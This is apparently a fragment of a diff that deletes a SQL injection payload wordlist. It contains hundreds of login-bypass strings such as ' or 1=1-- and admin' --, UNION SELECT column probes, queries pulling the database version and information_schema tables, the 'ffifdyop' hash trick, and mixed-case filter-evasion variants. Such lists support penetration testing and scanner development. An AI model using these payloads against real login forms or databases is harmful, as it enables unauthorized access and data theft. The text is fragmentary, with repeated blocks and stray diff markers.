") UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
") UniON SElecT 1,2#
|
|
||||||
") UniON SElecT 1,2,3#
|
|
||||||
") UniON SElecT 1,2,3,4#
|
|
||||||
") UniON SElecT 1,2,3,4,5#
|
|
||||||
")UniON(SElecT(1),2)-- 2
|
|
||||||
")UniON(SElecT(1),2,3)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
")UniON(SElecT(1),2)#
|
|
||||||
")UniON(SElecT(1),2,3)#
|
|
||||||
")UniON(SElecT(1),2,3,4)#
|
|
||||||
")UniON(SElecT(1),2,3,4,5)#
|
|
||||||
')||('2
|
|
||||||
')||2-- 2
|
|
||||||
')||'2'||('
|
|
||||||
')||2#
|
|
||||||
')||2/*
|
|
||||||
')||2||('
|
|
||||||
")||("2
|
|
||||||
")||2-- 2
|
|
||||||
")||"2"||("
|
|
||||||
")||2#
|
|
||||||
")||2/*
|
|
||||||
")||2||("
|
|
||||||
')||'2'=('2
|
|
||||||
')||'2'='2'||('
|
|
||||||
')||2=2-- 2
|
|
||||||
')||2=2#
|
|
||||||
')||2=2/*
|
|
||||||
')||2=2||('
|
|
||||||
")||"2"=("2
|
|
||||||
")||"2"="2"||("
|
|
||||||
")||2=2-- 2
|
|
||||||
")||2=2#
|
|
||||||
")||2=2/*
|
|
||||||
")||2=2||("
|
|
||||||
')||2=(2)LimIT(1)-- 2
|
|
||||||
')||2=(2)LimIT(1)#
|
|
||||||
')||2=(2)LimIT(1)/*
|
|
||||||
")||2=(2)LimIT(1)-- 2
|
|
||||||
")||2=(2)LimIT(1)#
|
|
||||||
")||2=(2)LimIT(1)/*
|
|
||||||
')||true-- 2
|
|
||||||
')||true#
|
|
||||||
')||true/*
|
|
||||||
')||true||('
|
|
||||||
")||true-- 2
|
|
||||||
")||true#
|
|
||||||
")||true/*
|
|
||||||
")||true||("
|
|
||||||
')||'2'LiKE('2
|
|
||||||
')||'2'LiKE'2'-- 2
|
|
||||||
')||'2'LiKE'2'#
|
|
||||||
')||'2'LiKE'2'/*
|
|
||||||
')||'2'LiKE'2'||('
|
|
||||||
')||(2)LiKE(2)-- 2
|
|
||||||
')||(2)LiKE(2)#
|
|
||||||
')||(2)LiKE(2)/*
|
|
||||||
')||(2)LiKE(2)||('
|
|
||||||
")||"2"LiKE("2
|
|
||||||
")||"2"LiKE"2"-- 2
|
|
||||||
")||"2"LiKE"2"#
|
|
||||||
")||"2"LiKE"2"/*
|
|
||||||
")||"2"LiKE"2"||("
|
|
||||||
")||(2)LiKE(2)-- 2
|
|
||||||
")||(2)LiKE(2)#
|
|
||||||
")||(2)LiKE(2)/*
|
|
||||||
")||(2)LiKE(2)||("
|
|
||||||
' UnION SELeCT 1,2`
|
|
||||||
' UnION SELeCT 1,2,3`
|
|
||||||
' UnION SELeCT 1,2,3,4`
|
|
||||||
' UnION SELeCT 1,2,3,4,5`
|
|
||||||
" UnION SELeCT 1,2`
|
|
||||||
" UnION SELeCT 1,2,3`
|
|
||||||
" UnION SELeCT 1,2,3,4`
|
|
||||||
" UnION SELeCT 1,2,3,4,5`
|
|
||||||
@ -1,771 +0,0 @@
|
|||||||
'-'
|
|
||||||
' '
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
' or ''-'
|
|
||||||
' or '' '
|
|
||||||
' or ''&'
|
|
||||||
' or ''^'
|
|
||||||
' or ''*'
|
|
||||||
"-"
|
|
||||||
" "
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
" or ""-"
|
|
||||||
" or "" "
|
|
||||||
" or ""&"
|
|
||||||
" or ""^"
|
|
||||||
" or ""*"
|
|
||||||
or true--
|
|
||||||
" or true--
|
|
||||||
' or true--
|
|
||||||
") or true--
|
|
||||||
') or true--
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x')=('x
|
|
||||||
')) or (('x'))=(('x
|
|
||||||
" or "x"="x
|
|
||||||
") or ("x")=("x
|
|
||||||
")) or (("x"))=(("x
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1#
|
|
||||||
or 1=1/*
|
|
||||||
admin' --
|
|
||||||
admin' #
|
|
||||||
admin'/*
|
|
||||||
admin' or '1'='1
|
|
||||||
admin' or '1'='1'--
|
|
||||||
admin' or '1'='1'#
|
|
||||||
admin' or '1'='1'/*
|
|
||||||
admin'or 1=1 or ''='
|
|
||||||
admin' or 1=1
|
|
||||||
admin' or 1=1--
|
|
||||||
admin' or 1=1#
|
|
||||||
admin' or 1=1/*
|
|
||||||
admin') or ('1'='1
|
|
||||||
admin') or ('1'='1'--
|
|
||||||
admin') or ('1'='1'#
|
|
||||||
admin') or ('1'='1'/*
|
|
||||||
admin') or '1'='1
|
|
||||||
admin') or '1'='1'--
|
|
||||||
admin') or '1'='1'#
|
|
||||||
admin') or '1'='1'/*
|
|
||||||
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
admin" --
|
|
||||||
admin" #
|
|
||||||
admin"/*
|
|
||||||
admin" or "1"="1
|
|
||||||
admin" or "1"="1"--
|
|
||||||
admin" or "1"="1"#
|
|
||||||
admin" or "1"="1"/*
|
|
||||||
admin"or 1=1 or ""="
|
|
||||||
admin" or 1=1
|
|
||||||
admin" or 1=1--
|
|
||||||
admin" or 1=1#
|
|
||||||
admin" or 1=1/*
|
|
||||||
admin") or ("1"="1
|
|
||||||
admin") or ("1"="1"--
|
|
||||||
admin") or ("1"="1"#
|
|
||||||
admin") or ("1"="1"/*
|
|
||||||
admin") or "1"="1
|
|
||||||
admin") or "1"="1"--
|
|
||||||
admin") or "1"="1"#
|
|
||||||
admin") or "1"="1"/*
|
|
||||||
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
' --
|
|
||||||
' #
|
|
||||||
' –
|
|
||||||
'--
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
" --
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
' and 1='1
|
|
||||||
' and a='a
|
|
||||||
or 1=1
|
|
||||||
or true
|
|
||||||
' or ''='
|
|
||||||
" or ""="
|
|
||||||
1′) and '1′='1–
|
|
||||||
' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
and 1=1
|
|
||||||
and 1=1–
|
|
||||||
' and 'one'='one
|
|
||||||
' and 'one'='one–
|
|
||||||
' group by password having 1=1--
|
|
||||||
' group by userid having 1=1--
|
|
||||||
' group by username having 1=1--
|
|
||||||
like '%'
|
|
||||||
or 0=0 --
|
|
||||||
or 0=0 #
|
|
||||||
or 0=0 –
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 --
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 –
|
|
||||||
" or 0=0 --
|
|
||||||
" or 0=0 #
|
|
||||||
" or 0=0 –
|
|
||||||
%' or '0'='0
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1/*
|
|
||||||
or 1=1#
|
|
||||||
or 1=1–
|
|
||||||
' or 1=1--
|
|
||||||
' or '1'='1
|
|
||||||
' or '1'='1'--
|
|
||||||
' or '1'='1'/*
|
|
||||||
' or '1'='1'#
|
|
||||||
' or '1′='1
|
|
||||||
' or 1=1
|
|
||||||
' or 1=1 --
|
|
||||||
' or 1=1 –
|
|
||||||
' or 1=1--
|
|
||||||
' or 1=1;#
|
|
||||||
' or 1=1/*
|
|
||||||
' or 1=1#
|
|
||||||
' or 1=1–
|
|
||||||
') or '1'='1
|
|
||||||
') or '1'='1--
|
|
||||||
') or '1'='1'--
|
|
||||||
') or '1'='1'/*
|
|
||||||
') or '1'='1'#
|
|
||||||
') or ('1'='1
|
|
||||||
') or ('1'='1--
|
|
||||||
') or ('1'='1'--
|
|
||||||
') or ('1'='1'/*
|
|
||||||
') or ('1'='1'#
|
|
||||||
'or'1=1
|
|
||||||
'or'1=1′
|
|
||||||
" or "1"="1
|
|
||||||
" or "1"="1"--
|
|
||||||
" or "1"="1"/*
|
|
||||||
" or "1"="1"#
|
|
||||||
" or 1=1
|
|
||||||
" or 1=1 --
|
|
||||||
" or 1=1 –
|
|
||||||
" or 1=1--
|
|
||||||
" or 1=1/*
|
|
||||||
" or 1=1#
|
|
||||||
" or 1=1–
|
|
||||||
") or "1"="1
|
|
||||||
") or "1"="1"--
|
|
||||||
") or "1"="1"/*
|
|
||||||
") or "1"="1"#
|
|
||||||
") or ("1"="1
|
|
||||||
") or ("1"="1"--
|
|
||||||
") or ("1"="1"/*
|
|
||||||
") or ("1"="1"#
|
|
||||||
) or '1′='1–
|
|
||||||
) or ('1′='1–
|
|
||||||
' or 1=1 LIMIT 1;#
|
|
||||||
'or 1=1 or ''='
|
|
||||||
"or 1=1 or ""="
|
|
||||||
' or 'a'='a
|
|
||||||
' or a=a--
|
|
||||||
' or a=a–
|
|
||||||
') or ('a'='a
|
|
||||||
" or "a"="a
|
|
||||||
") or ("a"="a
|
|
||||||
') or ('a'='a and hi") or ("a"="a
|
|
||||||
' or 'one'='one
|
|
||||||
' or 'one'='one–
|
|
||||||
' or uid like '%
|
|
||||||
' or uname like '%
|
|
||||||
' or userid like '%
|
|
||||||
' or user like '%
|
|
||||||
' or username like '%
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x'='x
|
|
||||||
" or "x"="x
|
|
||||||
' OR 'x'='x'#;
|
|
||||||
'=' 'or' and '=' 'or'
|
|
||||||
' UNION ALL SELECT 1, @@version;#
|
|
||||||
' UNION ALL SELECT system_user(),user();#
|
|
||||||
' UNION select table_schema,table_name FROM information_Schema.tables;#
|
|
||||||
admin' and substring(password/text(),1,1)='7
|
|
||||||
' and substring(password/text(),1,1)='7
|
|
||||||
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
"
|
|
||||||
'-- 2
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
"-- 2
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
'-'
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
'='
|
|
||||||
0'<'2
|
|
||||||
"-"
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
"="
|
|
||||||
0"<"2
|
|
||||||
|
|
||||||
')
|
|
||||||
")
|
|
||||||
')-- 2
|
|
||||||
')/*
|
|
||||||
')#
|
|
||||||
")-- 2
|
|
||||||
") #
|
|
||||||
")/*
|
|
||||||
')-('
|
|
||||||
')&('
|
|
||||||
')^('
|
|
||||||
')*('
|
|
||||||
')=('
|
|
||||||
0')<('2
|
|
||||||
")-("
|
|
||||||
")&("
|
|
||||||
")^("
|
|
||||||
")*("
|
|
||||||
")=("
|
|
||||||
0")<("2
|
|
||||||
|
|
||||||
'-''-- 2
|
|
||||||
'-''#
|
|
||||||
'-''/*
|
|
||||||
'&''-- 2
|
|
||||||
'&''#
|
|
||||||
'&''/*
|
|
||||||
'^''-- 2
|
|
||||||
'^''#
|
|
||||||
'^''/*
|
|
||||||
'*''-- 2
|
|
||||||
'*''#
|
|
||||||
'*''/*
|
|
||||||
'=''-- 2
|
|
||||||
'=''#
|
|
||||||
'=''/*
|
|
||||||
0'<'2'-- 2
|
|
||||||
0'<'2'#
|
|
||||||
0'<'2'/*
|
|
||||||
"-""-- 2
|
|
||||||
"-""#
|
|
||||||
"-""/*
|
|
||||||
"&""-- 2
|
|
||||||
"&""#
|
|
||||||
"&""/*
|
|
||||||
"^""-- 2
|
|
||||||
"^""#
|
|
||||||
"^""/*
|
|
||||||
"*""-- 2
|
|
||||||
"*""#
|
|
||||||
"*""/*
|
|
||||||
"=""-- 2
|
|
||||||
"=""#
|
|
||||||
"=""/*
|
|
||||||
0"<"2"-- 2
|
|
||||||
0"<"2"#
|
|
||||||
0"<"2"/*
|
|
||||||
|
|
||||||
')-''-- 2
|
|
||||||
')-''#
|
|
||||||
')-''/*
|
|
||||||
')&''-- 2
|
|
||||||
')&''#
|
|
||||||
')&''/*
|
|
||||||
')^''-- 2
|
|
||||||
')^''#
|
|
||||||
')^''/*
|
|
||||||
')*''-- 2
|
|
||||||
')*''#
|
|
||||||
')*''/*
|
|
||||||
')=''-- 2
|
|
||||||
')=''#
|
|
||||||
')=''/*
|
|
||||||
0')<'2'-- 2
|
|
||||||
0')<'2'#
|
|
||||||
0')<'2'/*
|
|
||||||
")-""-- 2
|
|
||||||
")-""#
|
|
||||||
")-""/*
|
|
||||||
")&""-- 2
|
|
||||||
")&""#
|
|
||||||
")&""/*
|
|
||||||
")^""-- 2
|
|
||||||
")^""#
|
|
||||||
")^""/*
|
|
||||||
")*""-- 2
|
|
||||||
")*""#
|
|
||||||
")*""/*
|
|
||||||
")=""-- 2
|
|
||||||
")=""#
|
|
||||||
")=""/*
|
|
||||||
0")<"2-- 2
|
|
||||||
0")<"2#
|
|
||||||
0")<"2/*
|
|
||||||
|
|
||||||
|
|
||||||
'oR'2
|
|
||||||
'oR'2'-- 2
|
|
||||||
'oR'2'#
|
|
||||||
'oR'2'/*
|
|
||||||
'oR'2'oR'
|
|
||||||
'oR(2)-- 2
|
|
||||||
'oR(2)#
|
|
||||||
'oR(2)/*
|
|
||||||
'oR(2)oR'
|
|
||||||
'oR 2-- 2
|
|
||||||
'oR 2#
|
|
||||||
'oR 2/*
|
|
||||||
'oR 2 oR'
|
|
||||||
'oR/**/2-- 2
|
|
||||||
'oR/**/2#
|
|
||||||
'oR/**/2/*
|
|
||||||
'oR/**/2/**/oR'
|
|
||||||
"oR"2
|
|
||||||
"oR"2"-- 2
|
|
||||||
"oR"2"#
|
|
||||||
"oR"2"/*
|
|
||||||
"oR"2"oR"
|
|
||||||
"oR(2)-- 2
|
|
||||||
"oR(2)#
|
|
||||||
"oR(2)/*
|
|
||||||
"oR(2)oR"
|
|
||||||
"oR 2-- 2
|
|
||||||
"oR 2#
|
|
||||||
"oR 2/*
|
|
||||||
"oR 2 oR"
|
|
||||||
"oR/**/2-- 2
|
|
||||||
"oR/**/2#
|
|
||||||
"oR/**/2/*
|
|
||||||
"oR/**/2/**/oR"
|
|
||||||
|
|
||||||
'oR'2'='2
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR'2'='2'-- 2
|
|
||||||
'oR'2'='2'#
|
|
||||||
'oR'2'='2'/*
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR 2=2-- 2
|
|
||||||
'oR 2=2#
|
|
||||||
'oR 2=2/*
|
|
||||||
'oR 2=2 oR'
|
|
||||||
'oR/**/2=2-- 2
|
|
||||||
'oR/**/2=2#
|
|
||||||
'oR/**/2=2/*
|
|
||||||
'oR/**/2=2/**/oR'
|
|
||||||
'oR(2)=2-- 2
|
|
||||||
'oR(2)=2#
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=(2)oR'
|
|
||||||
'oR'2'='2' LimIT 1-- 2
|
|
||||||
'oR'2'='2' LimIT 1#
|
|
||||||
'oR'2'='2' LimIT 1/*
|
|
||||||
'oR(2)=(2)LimIT(1)-- 2
|
|
||||||
'oR(2)=(2)LimIT(1)#
|
|
||||||
'oR(2)=(2)LimIT(1)/*
|
|
||||||
"oR"2"="2
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR"2"="2"-- 2
|
|
||||||
"oR"2"="2"#
|
|
||||||
"oR"2"="2"/*
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR 2=2-- 2
|
|
||||||
"oR 2=2#
|
|
||||||
"oR 2=2/*
|
|
||||||
"oR 2=2 oR"
|
|
||||||
"oR/**/2=2-- 2
|
|
||||||
"oR/**/2=2#
|
|
||||||
"oR/**/2=2/*
|
|
||||||
"oR/**/2=2/**/oR"
|
|
||||||
"oR(2)=2-- 2
|
|
||||||
"oR(2)=2#
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=(2)oR"
|
|
||||||
"oR"2"="2" LimIT 1-- 2
|
|
||||||
"oR"2"="2" LimIT 1#
|
|
||||||
"oR"2"="2" LimIT 1/*
|
|
||||||
"oR(2)=(2)LimIT(1)-- 2
|
|
||||||
"oR(2)=(2)LimIT(1)#
|
|
||||||
"oR(2)=(2)LimIT(1)/*
|
|
||||||
|
|
||||||
'oR true-- 2
|
|
||||||
'oR true#
|
|
||||||
'oR true/*
|
|
||||||
'oR true oR'
|
|
||||||
'oR(true)-- 2
|
|
||||||
'oR(true)#
|
|
||||||
'oR(true)/*
|
|
||||||
'oR(true)oR'
|
|
||||||
'oR/**/true-- 2
|
|
||||||
'oR/**/true#
|
|
||||||
'oR/**/true/*
|
|
||||||
'oR/**/true/**/oR'
|
|
||||||
"oR true-- 2
|
|
||||||
"oR true#
|
|
||||||
"oR true/*
|
|
||||||
"oR true oR"
|
|
||||||
"oR(true)-- 2
|
|
||||||
"oR(true)#
|
|
||||||
"oR(true)/*
|
|
||||||
"oR(true)oR"
|
|
||||||
"oR/**/true-- 2
|
|
||||||
"oR/**/true#
|
|
||||||
"oR/**/true/*
|
|
||||||
"oR/**/true/**/oR"
|
|
||||||
|
|
||||||
'oR'2'LiKE'2
|
|
||||||
'oR'2'LiKE'2'-- 2
|
|
||||||
'oR'2'LiKE'2'#
|
|
||||||
'oR'2'LiKE'2'/*
|
|
||||||
'oR'2'LiKE'2'oR'
|
|
||||||
'oR(2)LiKE(2)-- 2
|
|
||||||
'oR(2)LiKE(2)#
|
|
||||||
'oR(2)LiKE(2)/*
|
|
||||||
'oR(2)LiKE(2)oR'
|
|
||||||
"oR"2"LiKE"2
|
|
||||||
"oR"2"LiKE"2"-- 2
|
|
||||||
"oR"2"LiKE"2"#
|
|
||||||
"oR"2"LiKE"2"/*
|
|
||||||
"oR"2"LiKE"2"oR"
|
|
||||||
"oR(2)LiKE(2)-- 2
|
|
||||||
"oR(2)LiKE(2)#
|
|
||||||
"oR(2)LiKE(2)/*
|
|
||||||
"oR(2)LiKE(2)oR"
|
|
||||||
|
|
||||||
admin
|
|
||||||
admin'-- 2
|
|
||||||
admin'#
|
|
||||||
admin'/*
|
|
||||||
admin"-- 2
|
|
||||||
admin"#
|
|
||||||
ffifdyop
|
|
||||||
|
|
||||||
' UniON SElecT 1,2-- 2
|
|
||||||
' UniON SElecT 1,2,3-- 2
|
|
||||||
' UniON SElecT 1,2,3,4-- 2
|
|
||||||
' UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
' UniON SElecT 1,2#
|
|
||||||
' UniON SElecT 1,2,3#
|
|
||||||
' UniON SElecT 1,2,3,4#
|
|
||||||
' UniON SElecT 1,2,3,4,5#
|
|
||||||
'UniON(SElecT(1),2)-- 2
|
|
||||||
'UniON(SElecT(1),2,3)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
'UniON(SElecT(1),2)#
|
|
||||||
'UniON(SElecT(1),2,3)#
|
|
||||||
'UniON(SElecT(1),2,3,4)#
|
|
||||||
'UniON(SElecT(1),2,3,4,5)#
|
|
||||||
" UniON SElecT 1,2-- 2
|
|
||||||
" UniON SElecT 1,2,3-- 2
|
|
||||||
" UniON SElecT 1,2,3,4-- 2
|
|
||||||
" UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
" UniON SElecT 1,2#
|
|
||||||
" UniON SElecT 1,2,3#
|
|
||||||
" UniON SElecT 1,2,3,4#
|
|
||||||
" UniON SElecT 1,2,3,4,5#
|
|
||||||
"UniON(SElecT(1),2)-- 2
|
|
||||||
"UniON(SElecT(1),2,3)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
"UniON(SElecT(1),2)#
|
|
||||||
"UniON(SElecT(1),2,3)#
|
|
||||||
"UniON(SElecT(1),2,3,4)#
|
|
||||||
"UniON(SElecT(1),2,3,4,5)#
|
|
||||||
|
|
||||||
'||'2
|
|
||||||
'||2-- 2
|
|
||||||
'||'2'||'
|
|
||||||
'||2#
|
|
||||||
'||2/*
|
|
||||||
'||2||'
|
|
||||||
"||"2
|
|
||||||
"||2-- 2
|
|
||||||
"||"2"||"
|
|
||||||
"||2#
|
|
||||||
"||2/*
|
|
||||||
"||2||"
|
|
||||||
'||'2'='2
|
|
||||||
'||'2'='2'||'
|
|
||||||
'||2=2-- 2
|
|
||||||
'||2=2#
|
|
||||||
'||2=2/*
|
|
||||||
'||2=2||'
|
|
||||||
"||"2"="2
|
|
||||||
"||"2"="2"||"
|
|
||||||
"||2=2-- 2
|
|
||||||
"||2=2#
|
|
||||||
"||2=2/*
|
|
||||||
"||2=2||"
|
|
||||||
'||2=(2)LimIT(1)-- 2
|
|
||||||
'||2=(2)LimIT(1)#
|
|
||||||
'||2=(2)LimIT(1)/*
|
|
||||||
"||2=(2)LimIT(1)-- 2
|
|
||||||
"||2=(2)LimIT(1)#
|
|
||||||
"||2=(2)LimIT(1)/*
|
|
||||||
'||true-- 2
|
|
||||||
'||true#
|
|
||||||
'||true/*
|
|
||||||
'||true||'
|
|
||||||
"||true-- 2
|
|
||||||
"||true#
|
|
||||||
"||true/*
|
|
||||||
"||true||"
|
|
||||||
'||'2'LiKE'2
|
|
||||||
'||'2'LiKE'2'-- 2
|
|
||||||
'||'2'LiKE'2'#
|
|
||||||
'||'2'LiKE'2'/*
|
|
||||||
'||'2'LiKE'2'||'
|
|
||||||
'||(2)LiKE(2)-- 2
|
|
||||||
'||(2)LiKE(2)#
|
|
||||||
'||(2)LiKE(2)/*
|
|
||||||
'||(2)LiKE(2)||'
|
|
||||||
"||"2"LiKE"2
|
|
||||||
"||"2"LiKE"2"-- 2
|
|
||||||
"||"2"LiKE"2"#
|
|
||||||
"||"2"LiKE"2"/*
|
|
||||||
"||"2"LiKE"2"||"
|
|
||||||
"||(2)LiKE(2)-- 2
|
|
||||||
"||(2)LiKE(2)#
|
|
||||||
"||(2)LiKE(2)/*
|
|
||||||
"||(2)LiKE(2)||"
|
|
||||||
|
|
||||||
')oR('2
|
|
||||||
')oR'2'-- 2
|
|
||||||
')oR'2'#
|
|
||||||
')oR'2'/*
|
|
||||||
')oR'2'oR('
|
|
||||||
')oR(2)-- 2
|
|
||||||
')oR(2)#
|
|
||||||
')oR(2)/*
|
|
||||||
')oR(2)oR('
|
|
||||||
')oR 2-- 2
|
|
||||||
')oR 2#
|
|
||||||
')oR 2/*
|
|
||||||
')oR 2 oR('
|
|
||||||
')oR/**/2-- 2
|
|
||||||
')oR/**/2#
|
|
||||||
')oR/**/2/*
|
|
||||||
')oR/**/2/**/oR('
|
|
||||||
")oR("2
|
|
||||||
")oR"2"-- 2
|
|
||||||
")oR"2"#
|
|
||||||
")oR"2"/*
|
|
||||||
")oR"2"oR("
|
|
||||||
")oR(2)-- 2
|
|
||||||
")oR(2)#
|
|
||||||
")oR(2)/*
|
|
||||||
")oR(2)oR("
|
|
||||||
")oR 2-- 2
|
|
||||||
")oR 2#
|
|
||||||
")oR 2/*
|
|
||||||
")oR 2 oR("
|
|
||||||
")oR/**/2-- 2
|
|
||||||
")oR/**/2#
|
|
||||||
")oR/**/2/*
|
|
||||||
")oR/**/2/**/oR("
|
|
||||||
')oR'2'=('2
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR'2'='2'-- 2
|
|
||||||
')oR'2'='2'#
|
|
||||||
')oR'2'='2'/*
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR 2=2-- 2
|
|
||||||
')oR 2=2#
|
|
||||||
')oR 2=2/*
|
|
||||||
')oR 2=2 oR('
|
|
||||||
')oR/**/2=2-- 2
|
|
||||||
')oR/**/2=2#
|
|
||||||
')oR/**/2=2/*
|
|
||||||
')oR/**/2=2/**/oR('
|
|
||||||
')oR(2)=2-- 2
|
|
||||||
')oR(2)=2#
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=(2)oR('
|
|
||||||
')oR'2'='2' LimIT 1-- 2
|
|
||||||
')oR'2'='2' LimIT 1#
|
|
||||||
')oR'2'='2' LimIT 1/*
|
|
||||||
')oR(2)=(2)LimIT(1)-- 2
|
|
||||||
')oR(2)=(2)LimIT(1)#
|
|
||||||
')oR(2)=(2)LimIT(1)/*
|
|
||||||
")oR"2"=("2
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR"2"="2"-- 2
|
|
||||||
")oR"2"="2"#
|
|
||||||
")oR"2"="2"/*
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR 2=2-- 2
|
|
||||||
")oR 2=2#
|
|
||||||
")oR 2=2/*
|
|
||||||
")oR 2=2 oR("
|
|
||||||
")oR/**/2=2-- 2
|
|
||||||
")oR/**/2=2#
|
|
||||||
")oR/**/2=2/*
|
|
||||||
")oR/**/2=2/**/oR("
|
|
||||||
")oR(2)=2-- 2
|
|
||||||
")oR(2)=2#
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=(2)oR("
|
|
||||||
")oR"2"="2" LimIT 1-- 2
|
|
||||||
")oR"2"="2" LimIT 1#
|
|
||||||
")oR"2"="2" LimIT 1/*
|
|
||||||
")oR(2)=(2)LimIT(1)-- 2
|
|
||||||
")oR(2)=(2)LimIT(1)#
|
|
||||||
")oR(2)=(2)LimIT(1)/*
|
|
||||||
')oR true-- 2
|
|
||||||
')oR true#
|
|
||||||
')oR true/*
|
|
||||||
')oR true oR('
|
|
||||||
')oR(true)-- 2
|
|
||||||
')oR(true)#
|
|
||||||
')oR(true)/*
|
|
||||||
')oR(true)oR('
|
|
||||||
')oR/**/true-- 2
|
|
||||||
')oR/**/true#
|
|
||||||
')oR/**/true/*
|
|
||||||
')oR/**/true/**/oR('
|
|
||||||
")oR true-- 2
|
|
||||||
")oR true#
|
|
||||||
")oR true/*
|
|
||||||
")oR true oR("
|
|
||||||
")oR(true)-- 2
|
|
||||||
")oR(true)#
|
|
||||||
")oR(true)/*
|
|
||||||
")oR(true)oR("
|
|
||||||
")oR/**/true-- 2
|
|
||||||
")oR/**/true#
|
|
||||||
")oR/**/true/*
|
|
||||||
")oR/**/true/**/oR("
|
|
||||||
')oR'2'LiKE('2
|
|
||||||
')oR'2'LiKE'2'-- 2
|
|
||||||
')oR'2'LiKE'2'#
|
|
||||||
')oR'2'LiKE'2'/*
|
|
||||||
')oR'2'LiKE'2'oR('
|
|
||||||
')oR(2)LiKE(2)-- 2
|
|
||||||
')oR(2)LiKE(2)#
|
|
||||||
')oR(2)LiKE(2)/*
|
|
||||||
')oR(2)LiKE(2)oR('
|
|
||||||
")oR"2"LiKE("2
|
|
||||||
")oR"2"LiKE"2"-- 2
|
|
||||||
")oR"2"LiKE"2"#
|
|
||||||
")oR"2"LiKE"2"/*
|
|
||||||
")oR"2"LiKE"2"oR("
|
|
||||||
")oR(2)LiKE(2)-- 2
|
|
||||||
")oR(2)LiKE(2)#
|
|
||||||
")oR(2)LiKE(2)/*
|
|
||||||
")oR(2)LiKE(2)oR("
|
|
||||||
admin')-- 2
|
|
||||||
admin')#
|
|
||||||
admin')/*
|
|
||||||
admin")-- 2
|
|
||||||
admin")#
|
|
||||||
') UniON SElecT 1,2-- 2
|
|
||||||
') UniON SElecT 1,2,3-- 2
|
|
||||||
') UniON SElecT 1,2,3,4-- 2
|
|
||||||
') UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
') UniON SElecT 1,2#
|
|
||||||
') UniON SElecT 1,2,3#
|
|
||||||
') UniON SElecT 1,2,3,4#
|
|
||||||
') UniON SElecT 1,2,3,4,5#
|
|
||||||
')UniON(SElecT(1),2)-- 2
|
|
||||||
')UniON(SElecT(1),2,3)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
')UniON(SElecT(1),2)#
|
|
||||||
')UniON(SElecT(1),2,3)#
|
|
||||||
')UniON(SElecT(1),2,3,4)#
|
|
||||||
')UniON(SElecT(1),2,3,4,5)#
|
|
||||||
") UniON SElecT 1,2-- 2
|
|
||||||
") UniON SElecT 1,2,3-- 2
|
|
||||||
") UniON SElecT 1,2,3,4-- 2
|
|
||||||
") UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
") UniON SElecT 1,2#
|
|
||||||
") UniON SElecT 1,2,3#
|
|
||||||
") UniON SElecT 1,2,3,4#
|
|
||||||
") UniON SElecT 1,2,3,4,5#
|
|
||||||
")UniON(SElecT(1),2)-- 2
|
|
||||||
")UniON(SElecT(1),2,3)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
")UniON(SElecT(1),2)#
|
|
||||||
")UniON(SElecT(1),2,3)#
|
|
||||||
")UniON(SElecT(1),2,3,4)#
|
|
||||||
")UniON(SElecT(1),2,3,4,5)#
|
|
||||||
')||('2
|
|
||||||
')||2-- 2
|
|
||||||
')||'2'||('
|
|
||||||
')||2#
|
|
||||||
')||2/*
|
|
||||||
')||2||('
|
|
||||||
")||("2
|
|
||||||
")||2-- 2
|
|
||||||
")||"2"||("
|
|
||||||
")||2#
|
|
||||||
")||2/*
|
|
||||||
")||2||("
|
|
||||||
')||'2'=('2
|
|
